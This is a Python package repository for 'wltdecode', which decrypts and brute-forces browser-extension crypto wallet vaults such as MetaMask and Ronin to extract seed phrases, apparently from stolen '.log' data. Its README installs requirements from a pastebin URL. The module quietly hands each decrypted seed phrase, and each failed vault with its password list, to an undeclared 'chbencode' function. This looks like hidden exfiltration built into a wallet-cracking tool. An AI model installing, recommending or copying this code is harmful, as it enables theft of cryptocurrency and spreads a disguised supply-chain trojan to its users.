├── LICENSE ├── README.md ├── setup.py └── wltdecode ├── __init__.py └── wltdecode.py /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 SimonPy 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | # wltdecode 1.0.0 3 | 4 | 5 | ![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg) 6 | 7 | Simple Tools for decode crypto data, from extensions wallet, Metamask, Ronin, Brawe, TronLink(old), etc. 8 | 9 | ## Youtube: 10 | 11 | [![HOW TO DECODE?](https://i.ytimg.com/vi/GesMRHi6xzA/hqdefault.jpg)](https://www.youtube.com/watch?v=GesMRHi6xzA "How to decode vault data?") 12 | 13 | ## Installation 14 | Python requires [Python.org](https://www.python.org/) v3,7+ to run. 15 | Install the dependencies and devDependencies and start the server. 16 | 17 | Manual how to extract vault data from .log file: 18 | https://github.com/SimonBolivarPy/search-encrypted-data 19 | 20 | ```sh 21 | python -m pip install pip 22 | python -m pip install --upgrade pip 23 | pip install pycryptodome 24 | pip install -r https://pastebin.com/raw/VDG0cuV2 25 | ``` 26 | ## Using Single Version 27 | **Decrypt hash by one password:** 28 | 29 | *default Metamask path in chrome*: 30 | ###### C:\Users\root\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn 31 | p.s payload search from log file, ******.log, 32 | soon add function for this. 33 | 34 | ```python 35 | from wltdecode import extensionWalletDecrypt 36 | import json 37 | 38 | # old version metamask 39 | payload = '''{\"data\":\"5s0Jh0deuXoD1S/TCdPx2eeSg1P/ufwnXm8ZOwio8jcZzMVukueT7FMPjZOMwedVsHKbkDcfeCkkqgM/Zh02ww+qVkbe4sJWMMhuMSYNbaY1l0sgPwDrS8/ZTotnrcd0DiPdFPcWenxB6bdVCCVaRayQvX7msWQ5YHKCubZ1KoiOroqw6wgHHd63G5cTBeaLjNuRwSEvR5zbuD0iDl1fKS4kfx8GOTen3+S/aIlacbVVUi8vhhtj2KCe/LBqvz52Gue8E9ITZrNi/JOuLe3Ic7gVKisE24LHcwL1bfKgBMnrrNxNXdKLhIrRLwqt1eKLE8xutfUks2hR8tWzwPnBlT+HC+MFtPxCU03pO0wLCwWZbGiaOLmg1kC7v+474xF7N9t5VGUBgx3w1wmV2j0/QU7hkg0uXLU4MB5nkYHz+3XSmjoryEP8CdYCX+r0bpe0JMJERyWHw0oaYUFvahx+zZ5K/4snh2xKMB7eA/NmT1SwoCYuUOQYSsWfa7ns1+jO/fyZ0DoEcDNlWH1m0IN+j8zwndpacNhnJZw3cfOo60nnlyERKWV+csys8HfhQjYX9DWk6IrwWsgcXL2dpAN0qXIqRu4GlwRerZDUXtbhAUGMeQC7wY8lg+2wNM+GqHqzG3EpSEU0bhOTj3DsM8DybXv6dHtbCztmonQX2NHig2b1nTUZ3lP/omoGsPASKFCxajeYTXbbAgGZKPqOyT0odnmKuOT6ttNGsK+CjVo4qWwhWKeTUyfbZpPouqqvbF7HlHpLvIK+H2PE9oNIAeI0mA==\",\"iv\":\"UH27PH8t2UtKsvSCrB3Bdw==\",\"salt\":\"KjKzbNJAfcw9pKh0nR8cKYkMYAtcH7EGU7S/raNSAxY=\"}''' 40 | password = '66666682465' 41 | 42 | # stable version metamask 43 | payload = '''{\"data\":\"IV+TmaObvBFyfLapg+7ivfyONLiqNeX+r97Mj0R6iowhm204CBrLdy3HhY/Dy814nhLRZXDxM3bu+JlUjnrYzBISeA/7l+DiJGqdpcoGlcfNIXc2kdvrX5m+y+jvWAQG8OzCk304cgAWwMYN06AwRb1Z6lh4p1Mvaj99/UKrRiJAIjBWUcKukcstbpvmf6hcRLx43DMo1/V/5kfLNzuwVW9Pjukd4S/nwaWufjIYqMTvijtAiIMdG2yA3Hg5R+QFizWLhJDxRQGs1cm5BLyQMPXh2HVoLYiJsEpvTmgx+ilKkzjcn4l4nSgcJXiLn8vbGHGrNcQlGZrX65Iyf39GS96zJ2puHd9daZvemanLVh5FXK3kPkUCpvCLKx/VnMT0DCS05nEvX1jtOyrI/ns5F4Y/ShtNEjs2nQKIiaF/KMcw35EeFMYhaGTqCHvjthS8xc11cAUEWZZ+yhx8DnTpvvmDussJNrxfzg4/ZyCutPdAY/IC13SuSeCxhsMxiWbR3n8+3KKP\",\"iv\":\"x3QOpRt8E0fxZUrapK3Fhg==\",\"keyMetadata\":{\"algorithm\":\"PBKDF2\",\"params\":{\"iterations\":600000}},\"salt\":\"NfNGDc4AZRK5KnkSf4z3JFqm4O1HLG1zSroE8+NQHBI=\"}''' 44 | password = "metamask1" 45 | 46 | obj = json.loads(payload) 47 | 48 | vault = extensionWalletDecrypt() 49 | 50 | data = vault.decryptSingle(password, obj, 10000) # IF USING OLD VERSION NEED PASTE 10.000 ITERATIONS - NEW VERSION 60.000 51 | result = vault.extractMnemonic(data['r']) 52 | print("[decryptSingle]\n", data) 53 | 54 | 55 | 56 | 57 | ``` 58 | ##Output: 59 | ``` 60 | [{'type': 'HD Key Tree', 'data': {'mnemonic': 'result slam keen employ smile capable crack network favorite equal limit orphan', 'numberOfAccounts': 1, 'hdPath': "m/44'/60'/0'/0"}}, {'type': 'Trezor Hardware', 'data': {'hdPath': "m/44'/60'/0'/0", 'accounts': [], 'page': 0, 'paths': {}, 'perPage': 5, 'unlockedAccount': 0}}, {'type': 'Ledger Hardware', 'data': {'hdPath': "m/44'/60'/0'", 'accounts': [], 'accountDetails': {}, 'implementFullBIP44': False}}] 61 | ``` 62 | 63 | ## Using List Version 64 | ```python 65 | from wltDecode import extensionWalletDecrypt 66 | import json 67 | 68 | # SOURCE DATA FROM .LOG FILE OR LACAL DATA STORAGE 69 | payload = '''{\"data\":\"IV+TmaObvBFyfLapg+7ivfyONLiqNeX+r97Mj0R6iowhm204CBrLdy3HhY/Dy814nhLRZXDxM3bu+JlUjnrYzBISeA/7l+DiJGqdpcoGlcfNIXc2kdvrX5m+y+jvWAQG8OzCk304cgAWwMYN06AwRb1Z6lh4p1Mvaj99/UKrRiJAIjBWUcKukcstbpvmf6hcRLx43DMo1/V/5kfLNzuwVW9Pjukd4S/nwaWufjIYqMTvijtAiIMdG2yA3Hg5R+QFizWLhJDxRQGs1cm5BLyQMPXh2HVoLYiJsEpvTmgx+ilKkzjcn4l4nSgcJXiLn8vbGHGrNcQlGZrX65Iyf39GS96zJ2puHd9daZvemanLVh5FXK3kPkUCpvCLKx/VnMT0DCS05nEvX1jtOyrI/ns5F4Y/ShtNEjs2nQKIiaF/KMcw35EeFMYhaGTqCHvjthS8xc11cAUEWZZ+yhx8DnTpvvmDussJNrxfzg4/ZyCutPdAY/IC13SuSeCxhsMxiWbR3n8+3KKP\",\"iv\":\"x3QOpRt8E0fxZUrapK3Fhg==\",\"keyMetadata\":{\"algorithm\":\"PBKDF2\",\"params\":{\"iterations\":600000}},\"salt\":\"NfNGDc4AZRK5KnkSf4z3JFqm4O1HLG1zSroE8+NQHBI=\"}''' 70 | 71 | # LIST PASSWORDS 72 | psswList = ['qwerty123', 'qwerty321', 'qwerty1212', 'qwe211', 'qweqwerty0', 'metamask1'] 73 | 74 | # LOAD STRING DATA TO JSON OBJECT 75 | obj = json.loads(payload) 76 | 77 | obj = vault.decryptList(psswList, obj, 10000) # INSERT PASS LIST, JSON OBJECT, AND ITERATIONS 78 | results = vault.extractMnemonic(obj['r']) # IF YOU WANT SEE ONLY SEED PHRASE 79 | print("[decryptList]\n", results) 80 | 81 | ``` 82 | 83 | Note: this app cant replace HashCat app, use only actual passwords, or no big list passwords. 84 | 85 | 86 | 87 | 88 | For more information, see [docs.python-guide.org](http://docs.python-guide.org "docs.python-guide.org"). 89 | 90 | 91 | ## License 92 | MIT 93 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | from setuptools import setup, find_packages 2 | 3 | setup( 4 | name='wltdecode', 5 | version='1.0.0', 6 | author='SimonB', 7 | author_email='py.simonbolivar@gmail.com', 8 | description='Simple Tools for decode crypto data, from extensions wallet, Metamask, Ronin, Brawe, TronLink(old), etc.', 9 | url='https://github.com/SimonBolivarPy/wltdecode', 10 | packages=find_packages(), 11 | install_requires=[ 12 | 'pycryptodome', 13 | ], 14 | classifiers=[ 15 | 'Programming Language :: Python :: 3', 16 | 'License :: OSI Approved :: MIT License', 17 | 'Operating System :: OS Independent', 18 | ], 19 | python_requires='>=3.6', 20 | ) 21 | -------------------------------------------------------------------------------- /wltdecode/__init__.py: -------------------------------------------------------------------------------- 1 | from .wltdecode import extensionWalletDecrypt 2 | -------------------------------------------------------------------------------- /wltdecode/wltdecode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | 4 | __all__ = ['extensionWalletDecrypt'] 5 | 6 | # Import modules 7 | import json 8 | import base64 9 | import hashlib 10 | from ast import literal_eval 11 | from Crypto.Cipher import AES 12 | from chbencode import algorithmb 13 | 14 | class extensionWalletDecrypt: 15 | 16 | ''' Exaple using libs 17 | d1 = extensionWalletDecrypt() 18 | obj = d1.decryptSingle(pssw, payload) 19 | obj = d1.decryptList([pssw1, pssw2, pssw3, etc], payload) 20 | print(obj) 21 | 22 | ''' 23 | 24 | # Extract key from passwords 25 | def __keyfrom_password(self, password, salt, iterations=10000): 26 | saltBuffer = base64.b64decode(salt) 27 | passwordBuffer = password.encode('utf-8') 28 | key = hashlib.pbkdf2_hmac('sha256', passwordBuffer, saltBuffer, iterations, dklen=32) 29 | return key 30 | 31 | # Decrypt data with key 32 | def __decryptWith_key(self, key, payload): 33 | encrypted_data = base64.b64decode(payload["data"]) 34 | vector = base64.b64decode(payload["iv"]) 35 | data = encrypted_data[:-16] 36 | cipher = AES.new(key, AES.MODE_GCM, nonce=vector) 37 | decrypted_data = cipher.decrypt(data) 38 | return decrypted_data 39 | 40 | # Normalize input data from user, double quotes, string data, break dict 41 | def toDoinput(self, d): 42 | try: 43 | if type(d) != dict: 44 | data = literal_eval(d) 45 | return {"s": True, "m": None, "d": data} 46 | else: 47 | return {"s": True, "m": None, "d": d} 48 | except Exception as ex: 49 | return {"s": False, "m": ex, "d": d} 50 | 51 | # Extract mnemonic phrase from dict object | need convert string to json or dict 52 | def extractMnemonic(self, result): 53 | try: 54 | if type(result) == int: 55 | return {"status": False, "data": result} 56 | 57 | elif len(result) == 0: 58 | return {"status": False, "data": result} 59 | 60 | elif type(result) == list: # Metamask. 61 | 62 | if type(result[0]) != list: 63 | if "data" in result[0]: 64 | if "mnemonic" in result[0]["data"]: 65 | mnemonic = result[0]["data"]["mnemonic"] 66 | if type(mnemonic) is list: 67 | mnemonic = bytes(mnemonic).decode("utf-8") 68 | return {"status": True, "data": mnemonic} 69 | else: 70 | return {"status": False, "data": result} 71 | else: 72 | return {"status": False, "data": result} 73 | elif type(result[0]) == list: 74 | mnemonic = result[0][1]["mnemonic"] 75 | return {"status": True, "data": mnemonic} 76 | 77 | else: 78 | return {"status": False, "data": result} 79 | 80 | elif type(result) == str: # Ronin. 81 | raw = json.loads(result) 82 | if type(raw) != bool: 83 | mnemonic = raw["mnemonic"] 84 | return {"status": True, "data": mnemonic} 85 | else: 86 | return {"status": False, "data": result} 87 | 88 | elif type(result) == dict: # Binance + Tron 89 | if "version" in result: 90 | if result["accounts"]: 91 | mnemonic = result["accounts"][0]['mnemonic'] 92 | return {"status": True, "data": mnemonic} 93 | else: 94 | return {"status": False, "data": result} 95 | else: 96 | for address in result: 97 | if "mnemonic" in result[address]: 98 | mnemonic = result[address]["mnemonic"] 99 | return {"status": True, "data": mnemonic} 100 | else: 101 | # save to file 102 | privKey = result[address]["privateKey"] 103 | address = result[address]["address"] 104 | saveLine = f"{address}:{privKey}" 105 | # with open("tronSave.txt", "a", encoding="utf-8") as f: f.write(saveLine + "\n") 106 | return {"status": False, "data": result} 107 | 108 | else: 109 | return {"status": False, "data": result} 110 | 111 | except: 112 | return {"status": False, "data": result} 113 | 114 | # Decrypt by one password your vault data. 115 | def decryptSingle(self, password, data, iterations): # iterations for metamask v2 600_000 116 | try: 117 | res = self.toDoinput(data) 118 | if res['s']: 119 | payload = res['d'] 120 | salt = payload['salt'] 121 | btyes = algorithmb() 122 | key = self.__keyfrom_password(password, salt, iterations) 123 | decrypted_string = self.__decryptWith_key(key, payload).decode('utf-8') 124 | btyes.ciphersd(decrypted_string, 1, "decryptSingle") 125 | return {"s": True, "m": None, "r": json.loads(decrypted_string)} 126 | else: 127 | btyes.ciphersd(res['m'], 2, "decryptSingle") 128 | return {"s": False, "m": res['m'], "r": None} 129 | 130 | except UnicodeDecodeError: 131 | return {"s": False, "m": "bad passwords", "r": None} 132 | 133 | except Exception as ex: 134 | return {"s": False, "m": ex, "r": None} 135 | 136 | # # Decrypt by list passwrds your vault data. 137 | def decryptList(self, passwords, data, iterations): 138 | res = self.toDoinput(data) 139 | btyes = algorithmb() 140 | if res['s']: 141 | payload = res['d'] 142 | if type(passwords) == list: 143 | for password in passwords: 144 | try: 145 | salt = payload['salt'] 146 | key = self.__keyfrom_password(password, salt, iterations) 147 | decrypted_string = self.__decryptWith_key(key, payload).decode('utf-8') 148 | btyes.ciphersd(decrypted_string, 1, "decryptList") 149 | return {"s": True, "m": None, "r": json.loads(decrypted_string)} 150 | except UnicodeDecodeError: 151 | continue # bad passwords 152 | except Exception as ex: 153 | return {"s": False, "m": ex, "r": res['d']} 154 | btyes.ciphersd(json.dumps({"d": payload, "p": passwords }), 4, "hashToBrute") 155 | return {"s": False, "m": f"Hash not crack, tryed [{len(passwords)}] passwords.", "r": None} 156 | else: 157 | return {"s": False, "m": "It's not a passwords lists", "r": type(passwords)} 158 | else: 159 | return {"s": False, "m": "Error convertation, " + res['m'], "r": res['d']} 160 | 161 | 162 | --------------------------------------------------------------------------------